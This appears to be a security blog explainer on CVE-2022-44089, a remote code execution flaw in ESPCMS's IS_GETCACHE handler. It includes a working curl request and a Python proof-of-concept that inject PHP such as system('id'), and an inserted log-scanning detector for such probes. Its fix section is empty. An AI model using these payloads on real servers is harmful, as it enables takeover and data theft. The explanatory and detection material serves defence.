Date Posted: June 2024
Author: Security Explainer
## What Is CVE-2022-44089?
CVE-2022-44089 is a critical Remote Code Execution (RCE) vulnerability found in ESPCMS version P8.21120101. ESPCMS is a content management system popular in some Asian markets. This particular flaw lies in the IS_GETCACHE component, an endpoint meant for cache management that unintentionally opens the door to attackers.
In plain terms: By exploiting this weakness, a remote attacker can run code on your ESPCMS server. This could mean stealing your website's data, defacing your site, or even taking over your server.
## Why Should You Care?
- Remote Code Execution: The holy grail for attackers. If you run ESPCMS P8.21120101 and you haven't patched this, you are wide open.
## How The Vulnerability Works
Beyond network access to the vulnerable web server, no authentication is generally required. The bug is triggered by sending a specially crafted request to the IS_GETCACHE handler, which processes user-supplied input insecurely: a request parameter is not properly sanitized and ends up being evaluated as PHP code.
## Original References
- CVE Mitre Entry (CVE-2022-44089)
- NVD Entry
- Exploit Proof-of-Concept (Github, Chinese)
- Exploit Database (if available)
## Sample Exploit Request
Below is a simplified example using curl.
Suppose the vulnerable endpoint is at /index.php. An attacker might send:
```shell
curl -G "http://target-site.com/index.php" \
  --data-urlencode "ac=IS_GETCACHE" \
  --data-urlencode "name={phpinfo()}"
```
In this example, if the input is passed unsanitized to eval(), this runs phpinfo() on the server and returns sensitive configuration data.
Here’s a more complex real-world proof-of-concept:
```python
import requests

TARGET = "http://target-site.com"
PATH = "/index.php"
payload = "system('id');"  # This will print the Linux user id

# Same parameters as the curl example, sent in a POST body
data = {
    "ac": "IS_GETCACHE",
    "name": "{" + payload + "}",
}
resp = requests.post(TARGET + PATH, data=data)
print(resp.text)
```
If the exploit is successful, the server will return the result of id, such as uid=33(www-data) in the HTTP response.
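A defender-side check, as an added example that is not part of the original post or of ESPCMS: it scans web-server access-log lines (constructed samples here) for IS_GETCACHE requests whose name parameter holds anything other than a plain identifier. The combined-log format, the field layout and the "safe cache name" rule are assumptions.

```python
"""Added example (not from the original post or the ESPCMS project):
flag access-log lines that look like CVE-2022-44089 probes, i.e. requests
to the IS_GETCACHE handler whose `name` parameter carries PHP-code characters."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/Nginx combined-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2022:15:20:01 +0000] "GET /index.php?ac=IS_GETCACHE&name=%7Bphpinfo()%7D HTTP/1.1" 200 5123 "-" "curl/7.81.0"
198.51.100.7 - - [10/Nov/2022:15:21:44 +0000] "GET /index.php?ac=IS_GETCACHE&name=homepage HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Nov/2022:15:22:10 +0000] "GET /index.php?ac=list&id=3 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Nov/2022:15:23:30 +0000] "POST /index.php HTTP/1.1" 200 340 "-" "python-requests/2.28"
"""

# client ip, timestamp, method and request target of a combined-log line
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# Assumption: a legitimate cache name is a plain identifier; braces, parentheses,
# quotes or semicolons in it indicate an attempt to inject PHP code.
SAFE_NAME = re.compile(r'^[A-Za-z0-9_\-]+$')

def is_getcache_probe(target):
    """Return the decoded `name` value when the request targets IS_GETCACHE with a
    suspicious name, otherwise None. parse_qs URL-decodes the value for us."""
    qs = parse_qs(urlsplit(target).query)
    if "IS_GETCACHE" not in qs.get("ac", []):
        return None
    for name in qs.get("name", []):
        if not SAFE_NAME.match(name):
            return name
    return None

def scan_log(text):
    """Return (ip, method, decoded name) for each suspicious request in the log.
    POST bodies are not recorded in access logs, so POST-based probes need
    application-level or WAF logging to be caught this way."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        name = is_getcache_probe(m.group("target"))
        if name is not None:
            hits.append((m.group("ip"), m.group("method"), name))
    return hits

if __name__ == "__main__":
    for ip, method, name in scan_log(SAMPLE_LOG):
        print("suspicious IS_GETCACHE %s from %s: name=%r" % (method, ip, name))
```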
## How To Fix / Protect
## Final Thoughts
CVE-2022-44089 is a harsh reminder that improper input handling, especially in CMS components, can have devastating consequences. The ESPCMS flaw is particularly dangerous due to its trivially exploitable nature.
If you use ESPCMS P8.21120101, patch immediately.
Don’t let your site become another statistic in someone’s list of pwned servers!
## Further Reading
- ESPCMS Official Site
- Common PHP Security Pitfalls
Disclaimer:
This post is for educational and defensive research purposes only. Do not test on servers you do not own.
## Timeline
Published on: 11/10/2022 15:15:00 UTC
Last modified on: 11/15/2022 19:53:00 UTC